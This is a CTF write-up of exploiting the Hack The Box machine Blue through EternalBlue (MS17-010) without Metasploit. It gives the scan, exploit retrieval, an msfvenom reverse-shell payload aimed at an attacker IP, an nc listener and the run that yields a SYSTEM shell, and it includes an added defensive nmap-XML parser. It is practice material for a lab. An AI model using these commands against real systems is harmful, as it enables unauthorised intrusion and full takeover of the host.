Hack The Box — Blue — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
3 min read · Jun 4, 2023


Blue.htb

This is my 24th write-up for Blue, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a typical penetration test or CTF, there are usually three major phases:

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

First, let’s run an nmap scan on default ports to see what services are running on the target system.

nmap -sC -sV -O -oA nmap/initial blue.htb

So we have ports 139 and 445 open, and nmap also reports that the OS is most likely Windows 7 Professional Service Pack 1. The first thing that comes to my mind is the well-known vulnerability ‘EternalBlue’, AKA ‘MS17-010’. If you don’t know about this vulnerability, no need to worry: nmap can detect it for you if you run the smb-vuln* scripts against the target.
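As an added defender-side example (not part of the original write-up): a small parser over the XML file that nmap’s -oA writes, flagging hosts where any smb-vuln-* script reported a vulnerable state so they can be queued for patching. The embedded nmap XML, its addresses and the table key are constructed for this example.

```python
import xml.etree.ElementTree as ET

# Constructed nmap XML (the .xml file that -oA writes) for two hosts scanned with
# the smb-vuln-* NSE scripts.  Addresses, hostnames and the table key are made up.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><address addr="10.0.0.5" addrtype="ipv4"/>
    <hostnames><hostname name="blue.htb" type="user"/></hostnames>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: ...">
        <table key="example-vuln-id">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
      <script id="smb-vuln-ms10-054" output="false"/>
    </hostscript>
  </host>
  <host><address addr="10.0.0.6" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="example-vuln-id"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""

def is_vulnerable(state):
    """nmap's vulns library reports VULNERABLE, VULNERABLE (Exploitable),
    LIKELY VULNERABLE, NOT VULNERABLE or UNKNOWN; only the first three count."""
    st = (state or "").strip().upper()
    return st.startswith("VULNERABLE") or st.startswith("LIKELY VULNERABLE")

def vulnerable_smb_hosts(xml_text):
    """Return {host_label: [script ids]} for hosts where an smb-vuln-* script's
    structured (table) output carries a vulnerable state."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        name = host.find("hostnames/hostname")
        label = f"{name.get('name')} ({addr})" if name is not None else addr
        for script in host.iter("script"):
            sid = script.get("id", "")
            states = [e.text for e in script.iter("elem") if e.get("key") == "state"]
            if sid.startswith("smb-vuln-") and any(is_vulnerable(s) for s in states):
                findings.setdefault(label, []).append(sid)
    return findings
```

Hosts returned by vulnerable_smb_hosts() are the ones that still need the MS17-010 patch applied (and SMBv1 disabled); "NOT VULNERABLE" results are deliberately excluded.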

Initial Foothold

Since we are not using the Metasploit module, let’s search for an EternalBlue exploit.

searchsploit ms17-010

We will use exploit 42315.py. Let’s copy it into our current directory.

searchsploit -m windows/remote/42315.py

Let’s create a reverse shell payload that we will send.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.32 LPORT=4242 -f exe > shell.exe

We need to modify the exploit script a little. We need to set the username to guest, since the target allows guest login on SMB. Furthermore, we need to modify a few lines so that the script sends our newly generated payload and executes it.

username = guest
shell location and execution

We need to provide the location of our newly generated shell.exe and then execute the command cmd /c c:\shell.exe.

First, start the listener.

rlwrap nc -lvnp 4242

Now run the exploit with the IP address of the target, or its domain name if you have set up your /etc/hosts file accordingly.

python 42315.py blue.htb

Once the exploit runs…

We get the NT AUTHORITY\SYSTEM (root) shell.

EZ :)
